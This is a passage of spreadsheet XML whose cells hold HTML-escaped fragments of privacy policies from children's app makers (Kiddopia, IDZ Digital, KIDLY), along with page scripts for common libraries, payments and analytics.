        &lt;p class="copytext"&gt;&lt;em&gt;&lt;u&gt; The right to opt-in and opt-out of sale of Personal Information&lt;/u&gt;&lt;/em&gt; - You are entitled to direct us to
            stop
            disclosing your Personal Information to third parties for monetary or other valuable consideration.&lt;/p&gt;
        &lt;p class="copytext"&gt;&lt;em&gt;&lt;u&gt;</t>
  </si>
  <si>
    <t>The right to non-discrimination&lt;/u&gt;&lt;/em&gt; - We will not discriminate against you for exercising your rights
            under the
            CCPA. We will not deny you Our services, charge you different rates for Our services, or provide you a lower
            quality of services if you exercise your rights under the CCPA.&lt;/p&gt;
        &lt;h5&gt;How to exercise these rights?&lt;/h5&gt;&lt;br&gt;
        &lt;p class="copytext"&gt;To exercise the rights described above, you need to submit your verifiable request to us on
            “privacy@kiddopia.com”.&lt;/p&gt;
        &lt;p class="copytext"&gt;For us to respond to your request, it’s necessary that we know who you are.</t>
  </si>
  <si>
    <t>Therefore, you can only exercise
            the
            above rights by making a verifiable request which must:&lt;/p&gt;
        &lt;ul&gt;
            &lt;li class="copytext"&gt;provide sufficient information that allows us to reasonably verify you are the person about whom we
                collected
                personal information or an authorized representative;&lt;/li&gt;
            &lt;li class="copytext"&gt;describe your request with sufficient detail that allows us to properly understand, evaluate, and
                respond to
                it.&lt;/li&gt;
        &lt;/ul&gt;
        &lt;p class="copytext"&gt;We shall not respond to any request if we are unable to verify your identity and therefore confirm the
            personal
            information in Our possession actually relates to you. If you cannot personally submit a verifiable request,
            you
            can authorize a person registered with the California Secretary of State to act on your behalf.</t>
  </si>
  <si>
    <t>If you are
            an
            adult, you can make a verifiable request on behalf of a minor under your parental authority. You can submit
            a
            maximum number of 2 requests over a period of 12 months.&lt;/p&gt;&lt;br&gt;
        &lt;h5&gt; How and when we are expected to handle your request?&lt;/h5&gt;
        &lt;p class="copytext"&gt;We will confirm receipt of your verifiable request within 10 days and provide information about how we will
            process your request.</t>
  </si>
  <si>
    <t>In such cases, we may charge a reasonable fee, or refuse to act on the request. In
            either case, we will communicate Our choices and explain the reasons behind it.&lt;/p&gt;
    &lt;/div&gt;
    &lt;div id="9"&gt;
        &lt;h3&gt;9. Contact Us&lt;/h3&gt;&lt;br&gt;
        &lt;p class="copytext"&gt;Postal Address: Office no.505, Wellington Business Park, &lt;br&gt;
            Near Marol Naka, Andheri Kurla Road, &lt;br&gt;
            Andheri East, Mumbai-400059 &lt;br&gt;&lt;br&gt;
            Contact number: &lt;a href="tel:+912266940030"&gt;+91 22-66940030&lt;/a&gt; &lt;br&gt;
            Email Address: &lt;a href="mailto:privacy@kiddopia.com"&gt;privacy@kiddopia.com&lt;/a&gt;&lt;/p&gt;
    &lt;/div&gt;
    &lt;div id="10"&gt;
        &lt;h3&gt;10.</t>
  </si>
  <si>
    <t>Updates to the Privacy Notice&lt;/h3&gt;&lt;br&gt;
        &lt;p class="copytext"&gt;We reserve the right to amend, modify, vary or update this Privacy Notice, at Our sole discretion from time
            to
            time, as and when the need arises. The most recently published Privacy Notice shall prevail over any of its
            previous versions. You are encouraged to check this Privacy Notice from time to time to stay informed of any
            changes.</t>
  </si>
  <si>
    <t xml:space="preserve">Should the changes affect processing activities performed on the basis of the User’s consent, we
            shall collect new consent from the User, where required.&lt;/p&gt;
        &lt;p class="copytext"&gt;&lt;strong&gt;&lt;em&gt;This notice was last updated on 11 October 2022&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
    &lt;/div&gt;
    &lt;br&gt;&lt;br&gt;
&lt;/div&gt;
&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/fontfaceobserver/2.1.0/fontfaceobserver.js" integrity="sha512-b0xqcUdOhONKgZmeS/YSN/gd8QdAtetBOROQf3lqJF9uS0XHoEl2hUxBF/RMqMXdt2WUBq8drpNPjnEJxmka3Q==" crossorigin="anonymous"&gt;&lt;/script&gt;
&lt;script src="/static/vendor/js/yall.min.js"&gt;&lt;/script&gt;
&lt;script src="/static/vendor/js/jquery-3.5.1.min.js"&gt;&lt;/script&gt;
&lt;script src="/static/vendor/js/popper.min.js"&gt;&lt;/script&gt;
&lt;script src="/static/vendor/js/bootstrap.min.js"&gt;&lt;/script&gt;
&lt;script src="https://unpkg.com/@dotlottie/player-component@1.0.0/dist/dotlottie-player.js"&gt;&lt;/script&gt;
&lt;script src="https://unpkg.com/@lottiefiles/lottie-player@latest/dist/lottie-player.js"&gt;&lt;/script&gt;
&lt;script src="/static/vendor/js/swiper-bundle.min.js"&gt;&lt;/script&gt;
&lt;script src="/static/vendor/js/gsap.min.js"&gt;&lt;/script&gt;
&lt;script src="/static/vendor/js/ScrollTrigger.min.js"&gt;&lt;/script&gt;
&lt;script src="/static/vendor/js/slick.min.js"&gt;&lt;/script&gt;
&lt;script src="/static/vendor/js/easy-autocomplete.min.js"&gt;&lt;/script&gt;
&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/Trumbowyg/2.23.0/trumbowyg.min.js"
    integrity="sha512-sffB9/tXFFTwradcJHhojkhmrCj0hWeaz8M05Aaap5/vlYBfLx5Y7woKi6y0NrqVNgben6OIANTGGlojPTQGEw=="
    crossorigin="anonymous"&gt;&lt;/script&gt;
&lt;script src="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/js/select2.min.js"&gt;&lt;/script&gt;
 &lt;script src="https://js.stripe.com/v3/"&gt;&lt;/script&gt;
&lt;!-- The core Firebase JS SDK is always required and must be listed first --&gt;
&lt;script src="https://www.gstatic.com/firebasejs/8.6.7/firebase-app.js"&gt;&lt;/script&gt;
&lt;script src="https://www.gstatic.com/firebasejs/8.6.7/firebase-auth.js"&gt;&lt;/script&gt;
&lt;script src="/static/js/main/script.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;
    </t>
  </si>
  <si>
    <t>var flag_uri = '/static/images/country-flags/{country}-64.png';
     var stripe_us_public_key = 'pk_live_2K3JaVKtDo1jqmJDfS9Hg62i';
    var stripe_in_public_key = 'pk_live_bPdiHKLGFno16uJKMR8OUrcF00ipwxutvi';
    var recaptcha_client_key = '6LerTvcZAAAAAAEUBC1Z6aJrTnpLRVk3S3JgP-s0';
    var default_country_code</t>
  </si>
  <si>
    <t>If we learn that we have collected personal data about a child under age 13, we will delete that data as quickly as possible. If you believe that we might have any data from or about a child under the age of 13, please contact us.&lt;/br&gt;_x005F_x000D_
	We do not knowingly contact or do business with children under 13 years of age. If a parent/guardian becomes aware that a child under the age of 13 has attempted to contact and/or do business with us, please advise us by email at &lt;a class="numb" href="/cdn-cgi/l/email-protection#1665636666796462567f726c727f717f62777a3875797b"&gt;&lt;span class="__cf_email__" data-cfemail="bbc8cecbcbd4c9cffbd2dfc1dfd2dcd2cfdad795d8d4d6"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt; so that we may rectify the situation.&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;h2 class="main-h2"&gt;Changes to Privacy Policy:&lt;/h2&gt;_x005F_x000D_
			_x005F_x000D_
	&lt;p class="para" &gt;</t>
  </si>
  <si>
    <t xml:space="preserve">We reserve the right to modify our Privacy Policy at any time simply by posting such modification on this site and without any other notification. Any such modification will be effective immediately upon posting on this site. &lt;/br&gt;_x005F_x000D_
	</t>
  </si>
  <si>
    <t>The use of the information we collect is always subject to the Privacy Policy that is in effect at the time when this information is collected. You are advised to refer to the Privacy Policy from time to time so that you are always in sync with our current privacy practices.&lt;/p&gt;_x005F_x000D_
			_x005F_x000D_
	&lt;h2 class="main-h2"&gt;Contact Us:&lt;/h2&gt;_x005F_x000D_
			_x005F_x000D_
	&lt;p cclass="para" &gt; If there are any questions regarding this privacy policy, you may contact us using the information below.&lt;br&gt;_x005F_x000D_
	IDZ Digital Private Limited&lt;br&gt;_x005F_x000D_
	607, Western Edge II, Borivali East, Mumbai 400066, India&lt;br&gt;_x005F_x000D_
	Email: support at idzdigital.com (Replace at with @ and remove spaces)&lt;br&gt;_x005F_x000D_
	&lt;/p&gt;_x005F_x000D_
								_x005F_x000D_
	&lt;p class="para" &gt;</t>
  </si>
  <si>
    <t>This Privacy Policy was last modified on May 30, 2018.&lt;/p&gt;&lt;br&gt;_x005F_x000D_
  &lt;/div&gt;	_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;style&gt;_x005F_x000D_
.socio-icons {width:48px;}_x005F_x000D_
.list-group-item {_x005F_x000D_
    padding: .75rem 0.25rem;_x005F_x000D_
}_x005F_x000D_
.pis0 {padding-inline-start: 0px;}_x005F_x000D_
.d-inflex {display: inline-flex;}_x005F_x000D_
&lt;/style&gt;_x005F_x000D_
&lt;footer class=" text-center text-md-left padpurple" style="background-color:#F3F3F3;padding-top:10px;padding-bottom:10px;"&gt;_x005F_x000D_
  &lt;div class="container"&gt;_x005F_x000D_
	&lt;div class="row"&gt;_x005F_x000D_
	  &lt;div class="col-md-6"&gt;_x005F_x000D_
		&lt;a style="color:#000;" href="https://www.idzdigital.com/"&gt;&lt;img class="img-fluid logos" src="img/Logo-footer.png" alt="IDZ Logo"&gt; &lt;/a&gt;_x005F_x000D_
	  &lt;/div&gt;_x005F_x000D_
	  &lt;div class="col-md-6 text-center text-md-right"  &gt;_x005F_x000D_
		&lt;ul class="pis0 d-inflex flex-wrap list-group-horizontal"&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;"&gt;&lt;a href="https://www.facebook.com/idzdigital/" target="_blank" &gt;&lt;img class="socio-icons"  src="img/fb-icon.png" &gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;"&gt;&lt;a href="https://in.linkedin.com/company/idzdigital" target="_blank"&gt;&lt;img class="socio-icons"  src="img/linkedin-icon.png" &gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;"&gt;&lt;a href="https://www.youtube.com/channel/UCk648MRsOAP7uzD1HEqPC5g" target="_blank"&gt;&lt;img class="socio-icons"  src="img/youtube-icon.png" &gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;"&gt;&lt;a href="https://www.instagram.com/idz_digital/" target="_blank"&gt;&lt;img class="socio-icons"  src="img/insta.png" &gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;"&gt;&lt;a href="https://twitter.com/IDZDigital" target="_blank"&gt;&lt;img class="socio-icons"  src="img/twitter.png" &gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;/ul&gt;_x005F_x000D_
	  &lt;/div&gt;_x005F_x000D_
	&lt;/div&gt;_x005F_x000D_
	&lt;div class="row" style="padding-top:2%"&gt;_x005F_x000D_
	  &lt;div class="col-md-6"&gt;	_x005F_x000D_
		&lt;p style="font-size:20px;padding-top: .75rem;padding-left:5px;"&gt;© 2017-2023 &lt;a class="purple" href="https://www.idzdigital.com/" &gt;IDZ Digital Pvt. Ltd.&lt;/a&gt; All Rights Reserved.&lt;/p&gt;_x005F_x000D_
	  &lt;/div&gt;_x005F_x000D_
	  &lt;div class="col-md-6 text-center text-md-right" &gt;_x005F_x000D_
		&lt;ul class="pis0 d-inflex flex-wrap list-group-horizontal"&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;margin-right: 20px;"&gt;&lt;a class="purple" href="terms_of_service.php" style="text-decoration:none;font-size:20px;"&gt;Terms of service&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;"&gt;&lt;a class="purple" href="privacypolicy.php" style="text-decoration:none;font-size:20px;"&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
_x005F_x000D_
		&lt;/ul&gt;_x005F_x000D_
	  &lt;/div&gt;_x005F_x000D_
	&lt;/div&gt;_x005F_x000D_
  &lt;/div&gt;_x005F_x000D_
&lt;/footer&gt;_x005F_x000D_
&lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="./js/jquery.min.js"&gt;&lt;/script&gt;_x005F_x000D_
  &lt;script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"&gt;&lt;/script&gt;_x005F_x000D_
  &lt;script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/js/bootstrap.bundle.min.js"&gt;&lt;/script&gt;_x005F_x000D_
&lt;script&gt;_x005F_x000D_
_x005F_x000D_
	(function($) { "use strict";_x005F_x000D_
_x005F_x000D_
	  $(function() {_x005F_x000D_
		var header = $(".start-style");_x005F_x000D_
		$(window).scroll(function() {    _x005F_x000D_
			var scroll = $(window).scrollTop();_x005F_x000D_
		_x005F_x000D_
			if (scroll &gt;= 10) {_x005F_x000D_
				header.removeClass('start-style').addClass("scroll-on");_x005F_x000D_
			} else {_x005F_x000D_
				header.removeClass("scroll-on").addClass('start-style');_x005F_x000D_
			}_x005F_x000D_
		});_x005F_x000D_
	  });		_x005F_x000D_
		_x005F_x000D_
    })(jQuery); _x005F_x000D_
&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">Global site tag (gtag.js) - Google Analytics --&gt;_x005F_x000D_
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-186060183-1"&gt;&lt;/script&gt;_x005F_x000D_
&lt;script&gt;_x005F_x000D_
  window.dataLayer = window.dataLayer || [];_x005F_x000D_
  function gtag(){dataLayer.push(arguments);}_x005F_x000D_
  gtag('js', new Date());_x005F_x000D_
_x005F_x000D_
  gtag('config', 'UA-186060183-1');_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
&lt;!-- Default Statcounter code for Idzdigital.com_x005F_x000D_
</t>
  </si>
  <si>
    <t>http://idzdigital.com --&gt;_x005F_x000D_
&lt;script type="text/javascript"&gt;_x005F_x000D_
var sc_project=11610447; _x005F_x000D_
var sc_invisible=1; _x005F_x000D_
var sc_security="92b2e226"; _x005F_x000D_
&lt;/script&gt;_x005F_x000D_
 &lt;script type="text/javascript"_x005F_x000D_
src="https://www.statcounter.com/counter/counter.js"_x005F_x000D_
async&gt;&lt;/script&gt;_x005F_x000D_
&lt;noscript&gt;&lt;div class="statcounter"&gt;&lt;a title="Web Analytics_x005F_x000D_
Made Easy - StatCounter" href="https://statcounter.com/"_x005F_x000D_
target="_blank"&gt;&lt;img class="statcounter"_x005F_x000D_
src="https://c.statcounter.com/11610447/0/92b2e226/1/"_x005F_x000D_
alt="Web Analytics Made Easy -_x005F_x000D_
StatCounter"&gt;&lt;/a&gt;&lt;/div&gt;&lt;/noscript&gt;_x005F_x000D_
&lt;!-- End of Statcounter Code --&gt;_x005F_x000D_
&lt;/body&gt;_x005F_x000D_
&lt;/html&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;_x005F_x000D_
_x005F_x000D_
&lt;head&gt;_x005F_x000D_
&lt;meta http-equiv=Content-Type content="text/html; charset=utf-8"&gt;_x005F_x000D_
&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;_x005F_x000D_
&lt;meta name=Generator content="Microsoft Word 15 (filtered)"&gt;_x005F_x000D_
&lt;style&gt;_x005F_x000D_
&lt;!--_x005F_x000D_
 /* Font Definitions */_x005F_x000D_
 @font-face_x005F_x000D_
	{font-family:Wingdings;_x005F_x000D_
	panose-1:5 0 0 0 0 0 0 0 0 0;}_x005F_x000D_
@font-face_x005F_x000D_
	{font-family:"Cambria Math";_x005F_x000D_
	 panose-1:2 4 5 3 5 4 6 3 2 4;}_x005F_x000D_
@font-face_x005F_x000D_
	{font-family:"Segoe UI";_x005F_x000D_
	panose-1:2 11 5 2 4 2 4 2 2 3;}_x005F_x000D_
 /* Style Definitions */_x005F_x000D_
 </t>
  </si>
  <si>
    <t>p.MsoNormal, li. MsoNormal, div.MsoNormal_x005F_x000D_
	{margin:0in;_x005F_x000D_
	text-autospace:none;_x005F_x000D_
	font-size:11.0pt;_x005F_x000D_
	font-family:"Arial",sans-serif;}_x005F_x000D_
 p.MsoCommentText, li.</t>
  </si>
  <si>
    <t>MsoCommentText, div.MsoCommentText_x005F_x000D_
	{mso-style-link:"Comment Text Char";_x005F_x000D_
	margin:0in;_x005F_x000D_
	text-autospace:none;_x005F_x000D_
	font-size:10.0pt;_x005F_x000D_
	font-family:"Arial",sans-serif;}_x005F_x000D_
a:link, span. MsoHyperlink_x005F_x000D_
	{color:blue;_x005F_x000D_
	text-decoration:underline;}_x005F_x000D_
p_x005F_x000D_
	{margin-right:0in;_x005F_x000D_
	margin-left:0in;_x005F_x000D_
	font-size:12.0pt;_x005F_x000D_
	font-family:"Times New Roman",serif;}_x005F_x000D_
 p.MsoListParagraph, li.</t>
  </si>
  <si>
    <t>MsoListParagraph, div.MsoListParagraph_x005F_x000D_
	{margin:0in;_x005F_x000D_
	text-autospace:none;_x005F_x000D_
	font-size:11.0pt;_x005F_x000D_
	font-family:"Arial",sans-serif;}_x005F_x000D_
span. CommentTextChar_x005F_x000D_
	{mso-style-name:"Comment Text Char";_x005F_x000D_
	mso-style-link:"Comment Text";_x005F_x000D_
	font-family:"Arial",sans-serif;}_x005F_x000D_
p.TableParagraph, li. TableParagraph, div.TableParagraph_x005F_x000D_
	{mso-style-name:"Table Paragraph";_x005F_x000D_
	margin:0in;_x005F_x000D_
	text-autospace:none;_x005F_x000D_
	font-size:11.0pt;_x005F_x000D_
	font-family:"Arial",sans-serif;}_x005F_x000D_
.MsoChpDefault_x005F_x000D_
	{font-family:"Calibri",sans-serif;}_x005F_x000D_
.MsoPapDefault_x005F_x000D_
	{margin-bottom:8.0pt;_x005F_x000D_
	line-height:107%;}_x005F_x000D_
@page WordSection1_x005F_x000D_
	{size:595.3pt 841.9pt;_x005F_x000D_
	margin:70.9pt 70.9pt</t>
  </si>
  <si>
    <t>70.9pt 70.9pt;}_x005F_x000D_
div.WordSection1_x005F_x000D_
	{page:WordSection1;}_x005F_x000D_
 /* List Definitions */_x005F_x000D_
 ol_x005F_x000D_
	{margin-bottom:0in;}_x005F_x000D_
ul_x005F_x000D_
	{margin-bottom:0in;}_x005F_x000D_
--&gt;_x005F_x000D_
&lt;/style&gt;_x005F_x000D_
_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
_x005F_x000D_
&lt;body lang=EN-US link=blue vlink="#954F72" style='word-wrap:break-word'&gt;_x005F_x000D_
_x005F_x000D_
&lt;div class=WordSection1&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal align=center style='text-align:center;background:white;_x005F_x000D_
text-autospace:ideograph-numeric ideograph-other'&gt;&lt;b&gt;&lt;span lang=TR_x005F_x000D_
style='font-family:"Times New Roman",serif;color:black'&gt;PRIVACY POLICY&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal align=center style='text-align:center;background:white;_x005F_x000D_
text-autospace:ideograph-numeric ideograph-other'&gt;&lt;b&gt;&lt;span style='font-family:_x005F_x000D_
"Times New Roman",serif;color: black'&gt;INFORMATION NOTICE ON PROCESSING OF_x005F_x000D_
PERSONAL DATA&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='background:white;text-autospace:ideograph-numeric ideograph-other'&gt;&lt;span_x005F_x000D_
style='font-family:"Times New Roman",serif;color:black'&gt;We would like to inform_x005F_x000D_
you in connection with your personal data processed by &lt;b&gt;KIDLY YAYINCILIK VE_x005F_x000D_
PAZARLAMA ANONİM ŞİRKETİ&lt;/b&gt;, a company registered under 303659-5 in_x005F_x000D_
Istanbul Trade Registry Office (“&lt;b&gt;Company&lt;/b&gt;”), acting in the capacity of_x005F_x000D_
the Data Controller in accordance with the Personal Data Protection Law No._x005F_x000D_
6698 (“&lt;b&gt;Law&lt;/b&gt;”).</t>
  </si>
  <si>
    <t>The purpose of this Information Notice is to inform you_x005F_x000D_
about the personal data processing activities in case you: &lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='margin-left:.5in;text-indent:-.25in;background:white'&gt;&lt;span lang=TR_x005F_x000D_
style='font-size:10.0pt;font-family:"Courier New";position: relative;top:-1.0pt'&gt;o&lt;span_x005F_x000D_
style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black;position:relative;top:-1.0pt'&gt;Create_x005F_x000D_
a user account in KIDLY mobile application (“&lt;b&gt;Platform&lt;/b&gt;”); &lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='margin-left:.5in;text-indent:-.25in;background:white'&gt;&lt;span lang=TR_x005F_x000D_
style='font-size:10.0pt;font-family:"Courier New";position:relative;top:-1.0pt'&gt;o&lt;span_x005F_x000D_
style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black;position:relative;top:-1.0pt'&gt;Purchase_x005F_x000D_
monthly or yearly subscription to use additional services in the Platform; &lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='margin-left:.5in;text-indent:-.25in;background:white'&gt;&lt;span lang=TR_x005F_x000D_
style='font-size:10.0pt;font-family:"Courier New";position:relative;top:-1.0pt'&gt;o&lt;span_x005F_x000D_
style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black;position:relative;top:-1.0pt'&gt;Contact_x005F_x000D_
us over the website at www.gokidly.com, &lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='margin-left:.5in;text-indent:-.25in;background:white'&gt;&lt;span lang=TR_x005F_x000D_
style='font-size:10.0pt;font-family:"Courier New";position:relative;top:-1.0pt'&gt;o&lt;span_x005F_x000D_
style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black;position:relative;top:-1.0pt'&gt;Visit_x005F_x000D_
our website at www.gokidly.com, &lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='margin-left:.5in;text-indent:-.25in;background:white'&gt;&lt;span lang=TR_x005F_x000D_
style='font-size:10.0pt;font-family:"Courier New";position:relative;top:-1.0pt'&gt;o&lt;span_x005F_x000D_
style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black;position:relative;top:-1.0pt'&gt;Accept_x005F_x000D_
general and personal special campaign notifications through commercial_x005F_x000D_
communication channels.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoListParagraph style='margin-left:.5in;text-indent:-.25in;_x005F_x000D_
background:white;text-autospace:ideograph-numeric ideograph-other'&gt;&lt;span_x005F_x000D_
style='font-size:10.0pt;font-family:Symbol'&gt;·&lt;span style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;_x005F_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style='font-family:"Times New Roman",serif;color:black'&gt;Personal_x005F_x000D_
Data Processed, Purposes of Processing Personal Data, Recipients and Purposes_x005F_x000D_
of &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='margin-left:.25in;background:white;text-autospace:_x005F_x000D_
ideograph-numeric ideograph-other'&gt;&lt;span style='font-family:"Times New Roman",serif;_x005F_x000D_
color:black'&gt;We transfer your personal data in accordance with the purposes of_x005F_x000D_
processing specified, in the light of general principles specified in Article 4_x005F_x000D_
of the Law, they are processed through fully or partially automatic means or_x005F_x000D_
non-automatic means provided that they are a part of a data registration system_x005F_x000D_
and we transfer them to the specified recipient groups. Our Company takes the_x005F_x000D_
administrative and technical measures required to ensure security of your_x005F_x000D_
personal data.</t>
  </si>
  <si>
    <t>&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='text-align:justify'&gt;&lt;span lang=TR style='font-family:_x005F_x000D_
"Times New Roman",serif'&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoListParagraph style='margin-left:.5in;text-indent:-.25in;_x005F_x000D_
background:white;text-autospace:ideograph-numeric ideograph-other'&gt;&lt;b&gt;&lt;span_x005F_x000D_
lang=TR style='font-family:"Times New Roman",serif'&gt;1.&lt;span style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;_x005F_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=TR style='font-family:"Times New Roman",serif;_x005F_x000D_
color:black'&gt;Adult that Uses the Platform upon creating a user account &lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='text-align:justify'&gt;&lt;b&gt;&lt;span lang=TR_x005F_x000D_
style='font-family:"Times New Roman",serif'&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='margin-left:.5in;text-align:justify;text-indent:-.25in;background:_x005F_x000D_
white'&gt;&lt;span style='font-size:11.0pt'&gt;-&lt;span style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;_x005F_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span lang=TR style='font-size:11.0pt;color:black'&gt;Communication_x005F_x000D_
(&lt;/span&gt;&lt;/b&gt;&lt;i&gt;&lt;span style='font-size:11.0pt;color:black'&gt;E-Mail Address&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;)&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='margin-left:.5in;text-align:justify;text-indent:-.25in;background:_x005F_x000D_
white'&gt;&lt;span lang=TR style='font-size:10.0pt;font-family:"Courier New"'&gt;o&lt;span_x005F_x000D_
style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Purpose of Processing&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;: &lt;/span&gt;&lt;/b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Subscription processes&lt;/span&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;, c&lt;/span&gt;&lt;span style='font-size:_x005F_x000D_
11.0pt;color:black'&gt;ommunication of reports on the use of application &lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='margin-left:.5in;text-align:justify;text-indent:-.25in;background:_x005F_x000D_
white'&gt;&lt;span lang=TR style='font-size:10.0pt;font-family:"Courier New"'&gt;o&lt;span_x005F_x000D_
style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Legal Ground&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span lang=TR_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;: &lt;/span&gt;&lt;/b&gt;&lt;span style='font-size:11.0pt;_x005F_x000D_
color:black'&gt;Execution and performance of agreement&lt;/span&gt;&lt;span lang=TR_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;, &lt;/span&gt;&lt;span style='font-size:11.0pt;_x005F_x000D_
color:black'&gt;Explicit Consent (for transfer abroad&lt;/span&gt;&lt;span lang=TR_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;)&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p style='margin-left:.5in;text-align:justify;text-indent:-.25in;background:_x005F_x000D_
white'&gt;&lt;span lang=TR style='font-size:10.0pt;font-family:"Courier New"'&gt;o&lt;span_x005F_x000D_
style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Recipient&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span lang=TR_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;:</t>
  </si>
  <si>
